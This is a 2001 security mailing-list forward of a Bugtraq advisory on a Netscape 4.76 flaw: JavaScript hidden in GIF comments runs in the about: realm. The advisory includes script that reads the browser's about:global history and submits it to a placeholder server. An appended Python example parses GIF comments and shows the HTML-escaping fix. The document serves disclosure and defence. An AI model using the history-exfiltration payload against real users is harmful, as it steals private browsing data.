Date:      Tue, 10 Apr 2001 19:24:52 -0400 (EDT)
From:      Trevor Johnson <trevor@jpj.net>
To:        <security@freebsd.org>, <security-officer@freebsd.org>
Subject:   Netscape 4.76 gif comment flaw (fwd)
Message-ID:  <20010410192130.X3987-100000@blues.jpj.net>

I tried this with the 4.75 BSD/OS version, and found it has the bug.
-- 
Trevor Johnson

---------- Forwarded message ----------
Received: from lists.securityfocus.com (lists.securityfocus.com
    [66.38.151.7])
	by blues.jpj.net (8.11.1/8.11.1) with ESMTP id f39LbDa19977;
	Mon, 9 Apr 2001 17:37:13 -0400 (EDT)
Received: from lists.securityfocus.com (lists.securityfocus.com
    [66.38.151.7])
	by lists.securityfocus.com (Postfix) with ESMTP
	id 84B7E24C9AD; Mon,  9 Apr 2001 15:32:36 -0600 (MDT)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
          (LISTSERV-TCP/IP release 1.8d) with spool id 32328086 for
          BUGTRAQ@LISTS.SECURITYFOCUS.COM; Mon, 9 Apr 2001 15:32:01 -0600
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Received: from securityfocus.com (mail.securityfocus.com [66.38.151.9]) by
          lists.securityfocus.com (Postfix) with SMTP id 9B7D124C476 for
          <bugtraq@lists.securityfocus.com>; Mon,  9 Apr 2001 05:48:19 -0600
          (MDT)
Received: (qmail 6555 invoked by alias); 9 Apr 2001 11:48:18 -0000
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Received: (qmail 6534 invoked from network); 9 Apr 2001 11:48:17 -0000
Received: from mail-ffm-p.arcor-ip.de (HELO mail.arcor-ip.de)
    (145.253.2.10) by
          mail.securityfocus.com with SMTP; 9 Apr 2001 11:48:17 -0000
Received: from parallax.dividuum.com (145.253.171.27) by mail.arcor-ip.de; 9
          Apr 2001 13:48:15 +0200
Received: by parallax.dividuum.com (Postfix,
          from userid 500) id 3F3F23AD60; Mon,
      9 Apr 2001 13:48:26 +0200 (CEST)
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="FL5UXtIhxfXey3p5"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Message-ID:  <20010409134826.A2541@dividuum.de>
Date:         Mon, 9 Apr 2001 13:48:26 +0200
Reply-To: Florian Wesch <fw@DIVIDUUM.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Florian Wesch <fw@DIVIDUUM.DE>
Subject:      Netscape 4.76 gif comment flaw
To: BUGTRAQ@SECURITYFOCUS.COM

Product: Netscape Navigator/Communicator
Tested on: 4.76 (on Linux and Win98/NT)
Vendor Contact: Reported 2001-03-22

{ Problem }--------------------------------------------------------

- Overview:
    The Netscape browser does not escape the gif file comment in the
    image information page. This allows javascript execution in the
    "about:" protocol and can for example be used to upload the
    History (about:global) to a webserver.

- Detail:
    Netscape does not allow javascript to access documents from
    a different domain. This stops a javascript from one domain
    that tries to mess around with login forms/private data from another
    domain. The following error message is shown:

    "access disallowed from scripts at <javascriptdomain> to documents
    at another domain."

    Now there is the protocol "about:" that is used
    for some special tasks.

    about:          - shows Netscape version and copyrights
    about:blank     - shows a blank document
    about:config    - shows Browser configuration.
    about:global    - shows Information about the Netscape global history
    about:<url>     - shows Information about the specified url
    ..
    There are some other about: documents (try grepping the netscape binary).

    about:global is very interesting since all visited documents are
    listed there. So I tried to find a way to access this information.

    I created a frameset with 2 frames. The first frame (called foo)
    contains about:global. Using <frame src="about:global">,
    <meta http-equiv="refresh" content="10; URL=about:global"> or
    document.location.href="about:global"; for setting this url did not
    work. So I used the following trick to make it work:

        <base href="about:">
        <form action="global" name="loadhistory">
            <input type="submit">
        </form>
        <script language="javascript">
            document.loadhistory.submit();
        </script>

    My intention is that the second frame (called bar) grabs 10 urls
    in the first frame using javascript and sends them to the server.

    Accessing parent.frames["foo"].document.links does not work since
    foo is displaying an about: document and bar is a normal http document:
    "access disallowed from scripts at blah to documents..."

    So I tried to find a way to start a javascript within an
    about: document. about:<someurl> comes to mind since there are
    a lot of server-specified values.

    First I tried to inject javascript using the url of the script.
    But since this url is encoded (space => %20 etc.) there is no way
    in. Modifying the Content-Type (File MIME Type) did not work
    either because Netscape opens a "Save as..." window when
    supplying an unknown mimetype.

    Then I remembered that Netscape shows the comment included in
    gif files. A quick test showed that the comment is not escaped.
    So Javascript in gif comments is executed in the about: realm.
    This means that this script can then access the content of
    about:global. Nice.

    The following script included in the comment reads 10 urls in
    the about:global frame (foo), stores them in the form and finally
    submits this form.

    <form action=http://bla/ns476history.php target=_parent name=s method=get>
    <input name=u>
    </form>
    <script>
        f=parent.frames["foo"].document;
        l="";
        for(i=0;i<10;i++)
            l+=f.links[i]+"|";
        document.s.u.value=l;
        document.s.submit();
    </script>

    The server now has 10 urls from about:global.

    Accessing about:config should be possible too, but
    I did not try it.

{ Solution }--------------------------------------------------------

    Disable Javascript

    or

    Upgrade to 4.77

{ Exploit }---------------------------------------------------------

    attached

    or

    http://dividuum.de/security/netscape/

--------------------------------------------------------------------

Regards,
Florian Wesch <fw@dividuum.de>
http://dividuum.de


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
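The added example below is not part of either mail above and is not Netscape's code. It shows the defender's side of the flaw Florian describes: the GIF comment extension (block 0x21 with label 0xFE, data carried in length-prefixed sub-blocks, per the GIF89a layout) is attacker-controlled text, so any page that displays it has to HTML-escape it first. The block parses comments out of a constructed sample GIF, flags comments that carry markup (a cheap scanner heuristic, assumed here), and renders the text both the flawed way (raw interpolation, as the advisory reports) and the hardened way using html.escape. All block constants and the sample file are constructed for this example.

```python
import html
import struct

GIF_EXTENSION = 0x21
GIF_IMAGE = 0x2C
GIF_TRAILER = 0x3B
COMMENT_LABEL = 0xFE


def _sub_blocks(payload: bytes) -> bytes:
    """Encode payload as GIF data sub-blocks (<=255 bytes each, 0x00 terminator)."""
    out = bytearray()
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out.append(len(chunk))
        out += chunk
    out.append(0)
    return bytes(out)


def _read_sub_blocks(data: bytes, pos: int):
    """Concatenate GIF data sub-blocks starting at pos; return (bytes, next pos)."""
    out = bytearray()
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        out += data[pos:pos + n]
        pos += n


def build_gif_with_comment(comment: bytes) -> bytes:
    """Constructed sample: a 1x1 GIF89a carrying one comment extension."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)  # 2-entry global color table
    palette = b"\x00\x00\x00\xff\xff\xff"
    comment_ext = bytes([GIF_EXTENSION, COMMENT_LABEL]) + _sub_blocks(comment)
    image = bytes([GIF_IMAGE]) + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    image += b"\x02" + _sub_blocks(b"\x44\x01")  # LZW min code size 2, one pixel
    return header + palette + comment_ext + image + bytes([GIF_TRAILER])


def extract_gif_comments(data: bytes) -> list:
    """Walk the GIF block structure and return every comment extension as text."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    pos = 6
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, pos)
    pos += 7
    if packed & 0x80:                       # global color table present
        pos += 3 * (2 << (packed & 0x07))
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == GIF_TRAILER:
            break
        if block == GIF_EXTENSION:
            label = data[pos]
            pos += 1
            raw, pos = _read_sub_blocks(data, pos)
            if label == COMMENT_LABEL:
                comments.append(raw.decode("latin-1"))
        elif block == GIF_IMAGE:
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:         # local color table present
                pos += 3 * (2 << (local_packed & 0x07))
            pos += 1                        # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)
        else:
            raise ValueError("unexpected block 0x%02x at %d" % (block, pos - 1))
    return comments


def render_comment_unescaped(comments: list) -> str:
    """The flawed behaviour: comment text pasted straight into the info page."""
    return "<p>Comment: " + " ".join(comments) + "</p>"


def render_comment_escaped(comments: list) -> str:
    """Hardened form: HTML-escape attacker-controlled text before embedding it."""
    return "<p>Comment: " + html.escape(" ".join(comments), quote=True) + "</p>"


def comment_has_markup(comment: str) -> bool:
    """Cheap scanner heuristic (assumed): flag comments carrying HTML metacharacters."""
    return any(ch in comment for ch in "<>&\"'")


SAMPLE_GIF = build_gif_with_comment(b"<script>alert(1)</script>")  # constructed

if __name__ == "__main__":
    found = extract_gif_comments(SAMPLE_GIF)
    print("comments:", found)
    print("flagged:", [comment_has_markup(c) for c in found])
    print("unescaped:", render_comment_unescaped(found))
    print("escaped:  ", render_comment_escaped(found))
```

Comments longer than 255 bytes span several sub-blocks, so the reader joins them before decoding; a scanner that only looks at the first sub-block would miss markup that starts later in the comment. The escaped renderer is the fix the 4.77 upgrade corresponds to in spirit: the text is still shown, but it can no longer become script in the about: origin.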